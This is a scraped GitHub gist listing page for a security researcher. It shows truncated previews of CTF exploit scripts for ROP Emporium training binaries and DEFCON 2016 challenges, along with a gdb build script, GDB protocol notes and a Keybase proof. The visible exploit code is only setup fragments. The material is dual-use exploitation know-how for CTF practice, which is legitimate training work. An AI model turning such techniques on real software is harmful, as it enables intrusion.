Zach Riggle zachriggle

View RARVERSEME-README.txt
RARVM reversible/patchme
Modified 'unrar' source to dump context and disassembly.
Wrote two separate solvers since the challenge was broken.
To build the disassembler/debugger:
- unzip unrar-src-disassembler.zip -d unrar
- cd unrar
View gdb-python2.7-ubuntu.sh
apt-get install python2.7-dev python2.7
apt-get build-dep gdb
apt-get source gdb
sed -i -E "s|python3|/usr/bin/python2.7|" debian/rules
dpkg-buildpackage -uc -us -j8
dpkg -i ../*.deb
zachriggle / win.py
Created Sep 1, 2017
Example Exploit for ROP Emporium's ret2win Challenge
View win.py
from pwn import *
# Set up pwntools to work with this binary
elf = context.binary = ELF('ret2win')
# Enable verbose logging so we can see exactly what is being sent.
context.log_level = 'debug'
# Print out the target address
info("%#x target", elf.symbols.ret2win)
zachriggle / win.py
Created Sep 25, 2017
Exploit for ROP Emporium's "split"
View win.py
from pwn import *
# Set up pwntools to work with this binary
elf = context.binary = ELF('split')
# We need to invoke system("cat flag"), which requires knowing the
# location of both the function 'system' as well as the string 'cat flag'.
system = elf.symbols.system
cat_flag = elf.search("cat flag").next()
zachriggle / gdb.md
Last active Oct 25, 2017
I fucking hate you, GDB
View gdb.md

Lots of commands in GDB's protocol use hex-encoded data. A $ starts a packet, and all packets end with # followed by a one-byte, hex-encoded checksum.

Let's look at the protocol for the request:

remote get /proc/self/cmdline ./cmdline

Which should fetch /proc/self/cmdline and dump it to ./cmdline. It does!

$ phd cmdline
View keybase.md

Keybase proof

I hereby claim:

  • I am zachriggle on github.
  • I am zachriggle (https://keybase.io/zachriggle) on keybase.
  • I have a public key ASBYNpGGwzmRUnRb5-fg2Qy7jdirdXG-ECeIbGP_Lv72oQo

To claim this, I am signing this object:

View win2.py
from pwn import *
# Here's the disassembly for everything
"""
0804844b <vulnerable_function>:
804844b: 55 push ebp
804844c: 89 e5 mov ebp,esp
804844e: 81 ec 88 00 00 00 sub esp,0x88
8048454: 83 ec 04 sub esp,0x4
8048457: 68 00 01 00 00 push 0x100
View win.py
from pwn import *
# Here's the disassembly for everything
"""
0804844b <vulnerable_function>:
804844b: 55 push ebp
804844c: 89 e5 mov ebp,esp
804844e: 81 ec 88 00 00 00 sub esp,0x88
8048454: 83 ec 04 sub esp,0x4
8048457: 68 00 01 00 00 push 0x100
View README.md

DEFCON Quals 2016 Pwnable -- GladOS

The write-up is basically the exploit.

zachriggle / README.md
Last active May 25, 2016
DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit
View README.md

DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit Write-Up

The write-up is the exploit.

Example Output

[*] './heapfun4u'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO